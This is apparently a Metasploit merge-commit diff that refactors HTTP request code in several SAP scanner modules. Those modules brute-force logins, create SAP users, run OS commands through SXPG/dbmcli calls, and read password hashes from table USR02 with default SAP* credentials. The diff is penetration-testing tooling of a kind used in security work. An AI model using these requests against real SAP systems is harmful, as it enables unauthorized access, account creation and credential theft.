Merge branch 'master' into feature/mdm-module-namespace

Author: limhoff-r7

lib/msf/core/db.rb

@@ -2852,6 +2852,9 @@ def import_file(args={}, &block)
 		::File.open(filename, 'rb') do |f|
 			data = f.read(4)
 		end
+		if data.nil?
+			raise DBImportError.new("Zero-length file")
+		end
 
 		case data[0,4]
 		when "PK\x03\x04"

modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb

@@ -15,7 +15,7 @@ class Metasploit4 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'         => 'SAP Management Console ABAP syslog',
+			'Name'         => 'SAP Management Console ABAP Syslog Disclosure',
 			'Description'  => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. },
 			'References'   =>
 				[
@@ -106,15 +106,15 @@ def extractabap(rhost)
 		if success
 			print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
 			print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
-			store_loot(
+			path = store_loot(
 				"sap.abap.syslog",
 				"text/xml",
 				rhost,
 				res.body,
 				"sap_abap_syslog.xml",
 				"SAP ABAP syslog"
 			)
-
+			print_good("#{rhost}:#{rport} [SAP] SAP ABAP syslog XML file stored at #{path}")
 		elsif fault
 			print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
 			return

modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb

@@ -70,21 +70,20 @@ def run_host(ip)
 		data << '</n1:BAPI_USER_CREATE1>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		begin
 			print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers' =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction'     => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization'  => 'Basic ' + user_pass,
-					'Content-Type'   => 'text/xml; charset=UTF-8'
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
 					}
-				}, 45)
+			})
 			if res and res.code == 200
 				if res.body =~ /<h1>Logon failed<\/h1>/
 					print_error("[SAP] #{ip}:#{rport} - Logon failed")

modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb

@@ -118,19 +118,19 @@ def bruteforce(username,password,client)
 		data << '</n1:RFC_PING>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(username+ ":" + password)
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers' =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'}
-					}, 45)
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(username, password),
+				'headers' =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+					}
+			})
 			if res and res.code == 200
 				report_auth_info(
 					:host => rhost,

modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb

@@ -73,7 +73,7 @@ def create_payload(num)
 			if num == 1
 				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
 				space = "%programfiles:~10,1%"
-				command << datastore['COMMAND'].gsub(" ",space)
+				command << datastore['CMD'].gsub(" ",space)
 			end
 			command = '-ic c:\\\pwn.out' if num == 2
 		end
@@ -92,22 +92,19 @@ def create_payload(num)
 	end
 
 	def exec_command(ip,data)
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
 		begin
-			res = send_request_raw(
-				{
-					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-					'method' => 'POST',
-					'data' => data,
-					'headers' => {
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-						}
-				}, 45)
+			res = send_request_cgi({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+				}
+			})
 			if res and res.code != 500 and res.code != 200
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
 				return

modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb

@@ -74,7 +74,7 @@ def create_payload(num)
 			if num == 1
 				command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
 				space = "%programfiles:~10,1%"
-				command << datastore['COMMAND'].gsub(" ",space)
+				command << datastore['CMD'].gsub(" ",space)
 			end
 			command = '-ic c:\\\pwn.out' if num == 2
 		end
@@ -93,22 +93,19 @@ def create_payload(num)
 	end
 
 	def exec_command(ip,data)
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
 		begin
-			res = send_request_raw(
-				{
-					'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-					'method' => 'POST',
-					'data' => data,
-					'headers' => {
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-						'Authorization' => 'Basic ' + user_pass,
-						'Content-Type' => 'text/xml; charset=UTF-8'
-						}
-				}, 45)
+			res = send_request_cgi({
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+				'method' => 'POST',
+				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers' =>{
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+				}
+			})
 			if res
 				if res.code != 500 and res.code != 200
 					print_error("[SAP] #{ip}:#{rport} - something went wrong!")

modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb

@@ -61,22 +61,20 @@ def run_host(ip)
 		data << '</n1:RFC_PING>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
 				'method' => 'POST',
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
 				'data' => data,
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'ctype'  => 'text/xml; charset=UTF-8',
 				'headers' =>
 					{
-						'Content-Length' => data.size.to_s,
-						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-						'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-						'Authorization'  => 'Basic ' + user_pass,
-						'Content-Type'   => 'text/xml; charset=UTF-8'
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				if res and res.body =~ /<h1>Logon failed<\/h1>/
 					print_error("[SAP] #{ip}:#{rport} - login failed!")

modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb

@@ -49,8 +49,8 @@ def initialize
 				OptString.new('CLIENT', [true, 'SAP client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
 				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('TABLE', [true, 'Table to read', nil]),
-				OptString.new('FIELDS', [true, 'Fields to read', '*'])
+				OptString.new('TABLE', [true, 'Table to read', 'USR02']),
+				OptString.new('FIELDS', [true, 'Fields to read', 'BNAME,BCODE'])
 			], self.class)
 	end
 
@@ -82,21 +82,22 @@ def exec(ip,fields)
 		data << '</n1:RFC_READ_TABLE>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'ctype' => 'text/xml; charset=UTF-8',
 				'headers' =>{
-					'Content-Length' => data.size.to_s,
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
+					#'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+					#'Authorization' => 'Basic ' + user_pass,
+					#'Content-Type' =>
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				if res.body =~ /<h1>Logon failed<\/h1>/

modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb

@@ -68,42 +68,46 @@ def run_host(ip)
 		data << '</n1:SUSR_RFC_USER_INTERFACE>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+
 		begin
-			print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
-			res = send_request_raw({
+			vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
-				'headers'  =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'}
-					}, 45)
-				if res and res.code == 200
-					if res.body =~ /<h1>Logon failed<\/h1>/
-						print_error("[SAP] #{ip}:#{rport} - Logon failed")
-						return
-					elsif res.body =~ /faultstring/
-						error = []
-						error = [ res.body.scan(%r{(.*?)}) ]
-						print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
-						return
-					else
-						print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
-						return
-					end
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+				'headers'  =>
+					{
+						'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+					}
+				})
+			if res and res.code == 200
+				if res.body =~ /<h1>Logon failed<\/h1>/
+					vprint_error("[SAP] #{ip}:#{rport} - Logon failed")
+					return
+				elsif res.body =~ /faultstring/
+					error = []
+					error = [ res.body.scan(%r{(.*?)}) ]
+					vprint_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
+					return
 				else
-					print_error("[SAP] #{ip}:#{rport} - Unknown error")
-					print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
-					print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
+					print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
 					return
 				end
-			rescue ::Rex::ConnectionError
-				print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+			elsif res and res.code == 500 and res.body =~ /USER_ALLREADY_EXISTS/
+				vprint_error("[SAP] #{ip}:#{rport} - user already exists")
+				return
+			else
+				vprint_error("[SAP] #{ip}:#{rport} - Unknown error")
+				vprint_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
+				vprint_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
 				return
 			end
+		rescue ::Rex::ConnectionError
+			vprint_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+			return
 		end
 	end
+end

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb

@@ -49,7 +49,7 @@ def initialize
 				OptString.new('CLIENT', [true, 'SAP Client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
 				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
+				OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
 				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
 				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
 			], self.class)
@@ -72,21 +72,19 @@ def run_host(ip)
 		data << '</n1:SXPG_CALL_SYSTEM>'
 		data << '</env:Body>'
 		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
 		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
 				'method' => 'POST',
 				'data' => data,
+				'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+				'ctype' => 'text/xml; charset=UTF-8',
+				'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 				'headers' =>{
-					'Content-Length' => data.size.to_s,
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
 					}
-				}, 45)
+				})
 			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")